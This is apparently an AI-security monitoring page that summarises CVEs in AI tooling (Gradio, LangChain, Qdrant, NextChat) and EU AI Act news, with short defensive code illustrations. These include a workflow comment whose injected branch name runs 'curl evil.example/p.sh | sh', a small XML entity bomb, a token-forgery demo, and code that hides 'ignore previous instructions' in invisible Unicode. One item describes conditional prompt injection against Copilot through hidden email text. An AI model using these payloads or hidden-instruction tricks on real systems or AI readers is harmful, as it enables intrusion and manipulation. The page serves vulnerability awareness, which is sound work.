aisecwatch.com
Dashboard · Vulnerabilities · News · Research · Archive · Stats · Dataset

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

Vulnerabilities · News · Research · Digest Archive · Newsletter Archive · Subscribe · Data Sources · Statistics · Dataset · API · Integrations · Widget · RSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

3312 items

CVE-2024-3078: A vulnerability was found in Qdrant up to 1.6.1/1.7.4/1.8.2 and classified as critical. This issue affects some unknown…

medium · vulnerability
security
Mar 29, 2024
CVE-2024-3078

A critical vulnerability was discovered in Qdrant (a vector database system) versions up to 1.6.1, 1.7.4, and 1.8.2 that allows path traversal (a technique where attackers access files outside intended directories) through the Full Snapshot REST API (a web interface for creating system backups). This flaw could let attackers manipulate file paths to access unauthorized files on the system.

Fix: Upgrade to Qdrant version 1.8.3 or later. The specific patch is identified as 3ab5172e9c8f14fa1f7b24e7147eac74e2412b62.

NVD/CVE Database

CVE-2024-1729: A timing attack vulnerability exists in the gradio-app/gradio repository, specifically within the login function in rout…

medium · vulnerability
security
Mar 29, 2024
CVE-2024-1729

CVE-2024-1729 is a timing attack vulnerability (where an attacker guesses a password by measuring how long the system takes to reject it) in the Gradio application's login function. The vulnerability exists because the code directly compares the entered password with the stored password using a simple equality check, which can leak information through response time differences, potentially allowing attackers to bypass authentication and gain unauthorized access.

Fix: A patch is available at https://github.com/gradio-app/gradio/commit/e329f1fd38935213fe0e73962e8cbd5d3af6e87b. Additional details are available in the bounty report at https://huntr.com/bounties/f6a10a8d-f538-4cb7-9bb2-85d9f5708124.

NVD/CVE Database
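The class of bug is easy to illustrate. Below is a minimal sketch (not Gradio's actual code; the function name is hypothetical) of replacing a short-circuiting equality check with a constant-time comparison:

```python
import hmac

def check_password(supplied: str, stored: str) -> bool:
    # Vulnerable pattern: `supplied == stored` stops at the first differing
    # byte, so response time reveals how much of a guess is correct.
    # hmac.compare_digest takes the same time regardless of where (or
    # whether) the inputs differ, closing the timing side channel.
    return hmac.compare_digest(supplied.encode(), stored.encode())
```

Real deployments should additionally store only salted password hashes rather than comparing plaintext values at all.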

CVE-2024-29100: Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot. This issue affect…

critical · vulnerability
security
Mar 28, 2024
CVE-2024-29100

CVE-2024-29100 is an unrestricted file upload vulnerability (a security flaw that allows attackers to upload harmful files without proper checks) in the Jordy Meow AI Engine: ChatGPT Chatbot plugin for WordPress, affecting versions up to 2.1.4. This vulnerability could potentially allow attackers to upload dangerous files to a website using this plugin.

NVD/CVE Database

CVE-2024-29090: Server-Side Request Forgery (SSRF) vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot. This issue affects AI Engine:…

medium · vulnerability
security
Mar 28, 2024
CVE-2024-29090

A server-side request forgery (SSRF, a vulnerability where an attacker tricks a server into making unintended requests to other systems) vulnerability was found in the AI Engine: ChatGPT Chatbot plugin by Jordy Meow, affecting versions up to 2.1.4. The vulnerability allows authenticated attackers to exploit the plugin to perform unauthorized requests.

NVD/CVE Database

CVE-2024-1540: A command injection vulnerability exists in the deploy+test-visual.yml workflow of the gradio-app/gradio repository, due…

high · vulnerability
security
Mar 27, 2024
CVE-2024-1540

CVE-2024-1540 is a command injection vulnerability (a weakness where an attacker can insert malicious commands into code that gets executed) in the gradio-app/gradio repository's workflow file. Attackers could exploit this by manipulating GitHub context information within expressions to run unauthorized commands, potentially stealing secrets or modifying the repository. The vulnerability stems from unsafe handling of variables that are directly substituted into scripts before execution.

Fix: Remediation involves setting untrusted input values to intermediate environment variables to prevent direct influence on script generation.

NVD/CVE Database
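The environment-variable remediation pattern can be sketched as an illustrative workflow step (hypothetical, not the actual deploy+test-visual.yml contents; `github.head_ref` stands in for any attacker-controlled context value):

```yaml
# Vulnerable: the expression is pasted into the script verbatim, so a
# branch named  x"; curl evil.example/p.sh | sh; echo "  runs commands.
#   - run: echo "Deploying ${{ github.head_ref }}"

# Safer: route the untrusted value through an intermediate environment
# variable; the shell then treats it as data, never as script text.
- run: echo "Deploying $BRANCH"
  env:
    BRANCH: ${{ github.head_ref }}
```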

CVE-2024-2206: An SSRF vulnerability exists in the gradio-app/gradio due to insufficient validation of user-supplied URLs in the `/prox…

medium · vulnerability
security
Mar 27, 2024
CVE-2024-2206

CVE-2024-2206 is an SSRF vulnerability (server-side request forgery, where an attacker tricks a server into making requests to unintended targets) in Gradio, an AI framework. Attackers can exploit this by sending specially crafted requests with an `X-Direct-Url` header to add arbitrary URLs to a list that the application uses for proxying (forwarding) requests, potentially allowing unauthorized access to internal systems. The vulnerability exists because the application does not properly validate URLs in its `build_proxy_request` function.

NVD/CVE Database
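A minimal sketch of the missing validation step, assuming a hypothetical helper (not Gradio's actual fix): resolve the target host and reject anything that lands on a private, loopback, or otherwise non-public address before proxying.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_public_http_url(url: str) -> bool:
    """Reject URLs that do not resolve to a public IP address.

    A minimal denylist-style check; production code must also pin the
    resolved IP for the actual request to avoid DNS-rebinding races.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False  # blocks file://, gopher://, and schemeless input
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False  # internal target: refuse to proxy
    return True
```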

CVE-2024-1455: A vulnerability in the langchain-ai/langchain repository allows for a Billion Laughs Attack, a type of XML External Enti…

medium · vulnerability
security
Mar 26, 2024
CVE-2024-1455

CVE-2024-1455 is a vulnerability in the langchain-ai/langchain repository that allows a Billion Laughs Attack, a type of XML External Entity (XXE) exploitation where an attacker nests multiple layers of entities within an XML document to make the parser consume excessive CPU and memory resources, causing a denial of service (DoS, where a system becomes unavailable to legitimate users).

Fix: A patch is available at https://github.com/langchain-ai/langchain/commit/727d5023ce88e18e3074ef620a98137d26ff92a3.

NVD/CVE Database
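The expansion mechanism is easy to demonstrate at a safe scale with the standard-library parser (which, unlike defused alternatives, expands internal entities):

```python
import xml.etree.ElementTree as ET

# Scaled-down "laughs" bomb: each entity level multiplies the payload by 10.
# A real Billion Laughs document nests ~10 levels, expanding one reference
# into roughly 10**9 copies of "lol" and exhausting memory during parsing.
bomb = """<?xml version="1.0"?>
<!DOCTYPE r [
  <!ENTITY a "lol">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
]>
<r>&c;</r>"""

expanded = ET.fromstring(bomb).text
print(len(expanded))  # 300 characters of output from a ~250-byte document
```

Mitigations either disable DTD/entity processing entirely or cap the amplification factor, as newer expat versions do by default.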

The AI Office is hiring

info · regulatory
policy
Mar 22, 2024

The European Commission is hiring AI specialists to work in the AI Office, which will enforce the EU's AI Act by overseeing compliance of general-purpose AI models (large AI systems available to the public). The office will have real regulatory powers to require companies to implement safety measures, restrict models, or remove them from the market, and will develop evaluation tools and benchmarks to identify dangerous AI behaviors.

EU AI Act Updates

CVE-2024-1727: A Cross-Site Request Forgery (CSRF) vulnerability in gradio-app/gradio allows attackers to upload multiple large files t…

medium · vulnerability
security
Mar 21, 2024
CVE-2024-1727

CVE-2024-1727 is a CSRF vulnerability (cross-site request forgery, where an attacker tricks a victim into making unintended requests) in Gradio that lets attackers upload large files to a victim's computer without permission. An attacker can create a malicious webpage that, when visited, automatically uploads files to the victim's system, potentially filling up their disk space and causing a denial of service (making the system unusable).

Fix: A patch is available at https://github.com/gradio-app/gradio/commit/84802ee6a4806c25287344dce581f9548a99834a.

NVD/CVE Database

The AI Office: What is it, and how does it work?

info · regulatory
policy
Mar 21, 2024

The European AI Office is a new EU regulator created to oversee general-purpose AI (GPAI) models and systems, which are AI systems designed to perform a wide range of tasks, across all 27 EU Member States under the AI Act. It monitors compliance, analyzes emerging risks, develops evaluation capabilities, produces voluntary codes of practice for companies to follow, and coordinates enforcement between national regulators and international partners. The Office also supports small and medium businesses with compliance resources and oversees regulatory sandboxes, which are controlled environments where companies can test AI systems before full deployment.

EU AI Act Updates

CVE-2024-29037: datahub-helm provides the Kubernetes Helm charts for deploying Datahub and its dependencies on a Kubernetes cluster. Sta…

critical · vulnerability
security
Mar 20, 2024
CVE-2024-29037

A vulnerability in datahub-helm (Helm charts, which are templates for deploying applications on Kubernetes clusters) versions 0.1.143 through 0.2.181 allowed personal access tokens (credentials that grant access to the system) to be created using a publicly known default secret key instead of a random one. This meant attackers could potentially generate their own valid tokens to access DataHub instances if Metadata Service Authentication (a security feature) was enabled during a specific vulnerable time period.

Fix: Update to version 0.2.182, which contains a patch for this issue. As a workaround, reset the token signing key to be a random value, which will invalidate active personal access tokens.

NVD/CVE Database
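Why a default signing key is fatal: anyone who reads the public chart source knows the key and can mint tokens the server will accept. A hypothetical HMAC-signed token scheme (not DataHub's actual token format) makes the point:

```python
import base64, hashlib, hmac, json

def sign_token(payload: dict, key: bytes) -> str:
    # Token shape: base64(payload) + "." + HMAC-SHA256(payload).
    body = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode()
    sig = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"

def verify_token(token: str, key: bytes) -> bool:
    body, sig = token.rsplit(".", 1)
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected)

DEFAULT_KEY = b"change-me"  # hypothetical baked-in chart default: public knowledge
forged = sign_token({"actor": "attacker", "admin": True}, DEFAULT_KEY)
assert verify_token(forged, DEFAULT_KEY)  # server signed with the same default: accepted
```

Rotating the key to a random value, as the workaround suggests, makes every token signed under the default key fail verification.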

CVE-2024-29018: Moby is an open source container framework that is a key component of Docker Engine, Docker Desktop, and other distribut…

medium · vulnerability
security
Mar 20, 2024
CVE-2024-29018

Moby (the container framework underlying Docker) has a bug in how it handles DNS requests from internal networks (networks isolated from external communication). When a container on an internal network needs to resolve a domain name, Moby forwards the request through the host's network namespace instead of the container's own network, which can leak data to external servers that an attacker controls. Docker Desktop is not affected by this issue.

Fix: Moby releases 26.0.0, 25.0.4, and 23.0.11 are patched to prevent forwarding any DNS requests from internal networks. As a workaround, run containers intended to be solely attached to internal networks with a custom upstream address, which will force all upstream DNS queries to be resolved from the container's network namespace.

NVD/CVE Database

CVE-2023-49785: NextChat, also known as ChatGPT-Next-Web, is a cross-platform chat user interface for use with ChatGPT. Versions 2.11.2…

critical · vulnerability
security
Mar 12, 2024
CVE-2023-49785 · EPSS: 92.6%

NextChat (also called ChatGPT-Next-Web) version 2.11.2 and earlier has two security flaws: SSRF (server-side request forgery, where attackers trick the server into making unwanted requests) and XSS (cross-site scripting, where attackers inject malicious code into web pages). These flaws let attackers read internal server data, make changes to it, hide their location by routing traffic through the app, or attack other targets on the internet.

Fix: According to the source: "Users may avoid exposing the application to the public internet or, if exposing the application to the internet, ensure it is an isolated network with no access to any other internal resources." The source also notes that as of publication, no patch is available.

NVD/CVE Database

CVE-2024-2363: ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in AOL AIM Triton 1.0.4. It has been declared as problematic.

medium · vulnerability
security
Mar 10, 2024
CVE-2024-2363

A vulnerability was found in AOL AIM Triton 1.0.4 that allows remote attackers to cause a denial of service (making a service unavailable by overloading it) by manipulating the CSeq argument in the Invite Handler component. The vulnerability is now public knowledge and only affects this outdated, unsupported software version.

NVD/CVE Database

CVE-2024-27565: A Server-Side Request Forgery (SSRF) in weixin.php of ChatGPT-wechat-personal commit a0857f6 allows attackers to force t…

critical · vulnerability
security
Mar 5, 2024
CVE-2024-27565

CVE-2024-27565 is a server-side request forgery (SSRF, a flaw that allows attackers to trick a server into making unwanted requests to other systems) vulnerability found in the weixin.php file of ChatGPT-wechat-personal at commit a0857f6. This vulnerability lets attackers force the application to make arbitrary requests on their behalf. The vulnerability carries a CVSS severity score of 4.0 (a moderate score on the 0-10 scale measuring how serious a security flaw is).

NVD/CVE Database

ASCII Smuggler - Improvements

info · news
security
Mar 4, 2024

ASCII Smuggler is a tool that hides text within regular content using Unicode characters. This update adds optional rendering of Unicode Tags (special markers that show where hidden text begins and ends), URL decoding of input, flexible output modes to either highlight or isolate hidden text, and improved mobile compatibility with a better user interface.

Embrace The Red
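The underlying trick uses the Unicode "Tag" characters (the U+E0000 block), which mirror ASCII but render as nothing in most UIs, so encoded text is invisible to humans while still being read by LLMs and other text processors. A minimal sketch of the encode/decode round trip (illustrative, not the ASCII Smuggler source):

```python
TAG_BASE = 0xE0000  # offset from ASCII into the Unicode Tag block

def smuggle(text: str) -> str:
    # Shift each ASCII character into the invisible Tag range.
    return "".join(chr(TAG_BASE + ord(c)) for c in text)

def reveal(mixed: str) -> str:
    # Extract and shift back only characters inside the Tag range.
    return "".join(
        chr(ord(c) - TAG_BASE)
        for c in mixed
        if 0xE0000 < ord(c) < 0xE007F
    )

payload = smuggle("ignore previous instructions")
# `payload` is visually blank in most renderers, yet fully recoverable:
assert reveal("Hello! " + payload) == "ignore previous instructions"
```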

CVE-2024-28088: LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path pa…

high · vulnerability
security
Mar 4, 2024
CVE-2024-28088 · EPSS: 10.7%

LangChain versions up to 0.1.10 have a path traversal vulnerability (a flaw where an attacker can use ../ sequences to access files outside the intended directory) that allows someone controlling part of a file path to load configurations from anywhere instead of just the intended GitHub repository, potentially exposing API keys or enabling remote code execution (running malicious commands on a system). This bug affects how the load_chain function handles file paths.

Fix: A patch is available in langchain-core version 0.1.29 and later. Update to this version or newer to fix the vulnerability.

NVD/CVE Database
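The generic guard against this kind of ../ traversal is to resolve the combined path and verify it is still contained in the allowed root. A minimal sketch with a hypothetical base directory (not LangChain's actual patch):

```python
from pathlib import Path

BASE = Path("/srv/hub/configs")  # hypothetical allowed root

def safe_load_path(user_part: str) -> Path:
    # Resolve the combined path, then verify it stayed inside BASE;
    # any "../" sequence that escapes the root is rejected.
    candidate = (BASE / user_part).resolve()
    if not candidate.is_relative_to(BASE.resolve()):
        raise ValueError(f"path escapes base directory: {user_part}")
    return candidate
```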

Who Am I? Conditional Prompt Injection Attacks with Microsoft Copilot

medium · news
security · research

Mar 3, 2024

Attackers can create conditional prompt injection attacks (tricking an AI by hiding malicious instructions in its input that activate only for specific users) against Microsoft Copilot by leveraging user identity information, such as names and job titles, that the AI includes in its context. A researcher demonstrated this by sending an email with hidden instructions that made Copilot behave differently depending on which person opened it, showing that LLM applications become more vulnerable as attackers learn to target specific users rather than all users equally.

Embrace The Red

CVE-2024-2057: A vulnerability was found in LangChain langchain_community 0.0.26. It has been classified as critical. Affected is the f…

medium · vulnerability
security
Mar 1, 2024
CVE-2024-2057

A critical vulnerability was found in LangChain's langchain_community library version 0.0.26 in the TFIDFRetriever component (a tool that retrieves relevant documents for AI systems). The flaw allows server-side request forgery (SSRF, where an attacker tricks a server into making unwanted network requests on their behalf), and it can be exploited remotely.

Fix: Upgrading to version 0.0.27 addresses this issue.

NVD/CVE Database

AI Act Implementation: Timelines & Next steps

info · regulatory
policy
Feb 28, 2024

The EU AI Act is a regulatory framework that requires companies to comply with rules for different types of AI systems on specific timelines, starting with prohibitions on the riskiest AI uses within 6 months and expanding to cover high-risk AI systems (such as those used in law enforcement, hiring, or education) by 24 months after the law takes effect. The article outlines key compliance deadlines, secondary laws the EU Commission might create to clarify the rules, and guidance documents to help organizations understand how to follow the AI Act.

EU AI Act Updates
